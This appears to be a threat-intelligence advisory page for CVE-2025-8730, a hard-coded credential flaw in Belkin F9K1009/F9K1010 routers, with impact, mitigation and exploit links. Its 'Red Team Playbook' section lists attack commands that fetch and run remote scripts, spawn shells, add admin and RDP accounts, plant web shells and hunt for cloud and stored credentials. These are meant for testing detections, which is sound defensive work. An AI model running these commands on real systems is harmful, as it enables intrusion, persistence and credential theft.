CVE-2025-8730
Overview
The vulnerability is a hard-coded credential issue within the Web Interface component of Belkin F9K1009 and F9K1010 firmware versions 2.00.04 and 2.00.09. This flaw arises from embedded static credentials in the device's web management interface, which are not dynamically generated or configurable. The root cause is the presence of these fixed authentication secrets accessible through the web interface functionality, enabling unauthorized access vectors.
Vulnerability Description
A vulnerability was found in Belkin F9K1009 and F9K1010 2.00.04/2.00.09 and classified as critical. Affected by this issue is some unknown functionality of the component Web Interface. The manipulation leads to hard-coded credentials. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Impact
An unauthenticated remote attacker can gain administrative access to the affected devices by exploiting the hard-coded credentials in the web interface. This allows full control over device configuration, potentially leading to network compromise, data interception, or persistent unauthorized access. No user interaction or prior authentication is required (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward in exposed network environments. The vulnerability impacts confidentiality, integrity, and availability (C:H/I:H/A:H) of the device and connected networks.
Solution
No official vendor patch or advisory has been released as the vendor did not respond to disclosure attempts. Users of Belkin F9K1009 and F9K1010 devices running firmware versions 2.00.04 and 2.00.09 should monitor https://vuldb.com/?id.319226 for updates. In absence of vendor guidance, network administrators should restrict access to the device’s web interface to trusted networks only and consider device replacement or firmware downgrade if feasible.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in specific models of Belkin routers, particularly the F9K1009 and F9K1010, which exposes the web interface to unauthorized access due to hard-coded credentials. This flaw allows attackers to bypass authentication mechanisms, granting them the ability to manipulate router settings and potentially compromise the entire network. The presence of hard-coded credentials indicates a severe oversight in secure coding practices, as these credentials can be easily extracted and exploited by malicious actors. The vulnerability exists in the web interface component, which is typically accessible over the internet, thus increasing the risk of remote exploitation.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Given that the hard-coded credentials can be accessed remotely, an attacker does not need physical access to the device to initiate an attack. This could involve scanning for vulnerable devices on the internet and using the known credentials to gain administrative access. Once inside, an attacker could alter configurations, redirect traffic, or even deploy malware across the network. The public disclosure of this vulnerability means that malicious actors are likely already developing and deploying automated tools to exploit it, further amplifying the urgency for affected users to take action.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on these routers for their network infrastructure. Compromised routers can lead to data breaches, loss of sensitive information, and potential legal ramifications depending on the nature of the data involved. Additionally, the manipulation of network settings can result in service disruptions, affecting business operations and customer trust. The high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, and organizations using these devices must prioritize remediation to avoid severe consequences.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their network devices to identify any affected Belkin routers. Regular vulnerability assessments and penetration testing can help uncover potential weaknesses before they are exploited. In terms of mitigation, immediate steps include changing any default settings, disabling remote management features if they are not needed, and implementing network segmentation to limit exposure. Additionally, organizations should consider replacing affected devices with more secure alternatives that do not have hard-coded credentials. Keeping firmware updated is crucial, as vendors may release patches to address such vulnerabilities, although the lack of response from the vendor in this case raises concerns about their commitment to security.
In conclusion, the critical vulnerability in Belkin routers presents a substantial threat to both individual users and organizations. The combination of hard-coded credentials and remote exploitability creates a perfect storm for potential attackers. It is imperative for affected users to take immediate action to secure their networks, as the consequences of inaction could be dire. By implementing robust detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and ensure the integrity of their network infrastructure.
CSURFACE threat intelligence has identified a marked escalation in the exploitability potential of CVE-2025-8730, as reflected by a substantial increase in the Exploit Prediction Scoring System (EPSS) from 0.2653 to 0.4511. This upward trend indicates growing attacker interest and a heightened likelihood of successful exploitation in the wild. Our telemetry further reveals a consistent upward trajectory in exploitation attempts over the past week, underscoring the vulnerability’s increasing attractiveness to threat actors. The availability of public proof-of-concept exploits continues to lower the barrier for adversaries, facilitating broader exploitation campaigns. This evolution significantly elevates the threat posture for organizations relying on affected Belkin router models, as the combination of remote exploitability and hard-coded credentials presents a persistent and accessible attack vector. Consequently, the risk level associated with this vulnerability has intensified, warranting heightened vigilance and prioritization in vulnerability management processes.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials | Byte Reaper | remote | multiple | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
byteReaper77/CVE-2025-8730
Exploit demonstrating an authentication bypass vulnerability in the web interface of Belkin F9K1009 and F9K1010 routers...
|
byteReaper77 | 2 | 0 | 2025-08-08 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-70 | Try Common or Default Usernames and Passwords |
35%
|
Medium | High | |
| CAPEC-191 | Read Sensitive Constants Within an Executable |
33%
|
— | Low |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-8730 |
| vuldb.com |
GitHub CVE
vdb-entry
|
https://vuldb.com/?id.319226 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.319226 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.621747 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.621748 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.621760 |
| github.com |
GitHub CVE
related
|
https://github.com/Nicholas-wei/bug-discovery/blob/main/belkin/F9K1009_WW_2.00.09/belkin%20F9K1009_WW_2.00.09_hardcoded_credential.pdf |
| github.com |
GitHub CVE
exploit
|
https://github.com/Nicholas-wei/bug-discovery/blob/main/belkin/F9K1010_WW_2.00.04/belkin_F9K1010_WW_2.00.04_hardcoded_credential.pdf |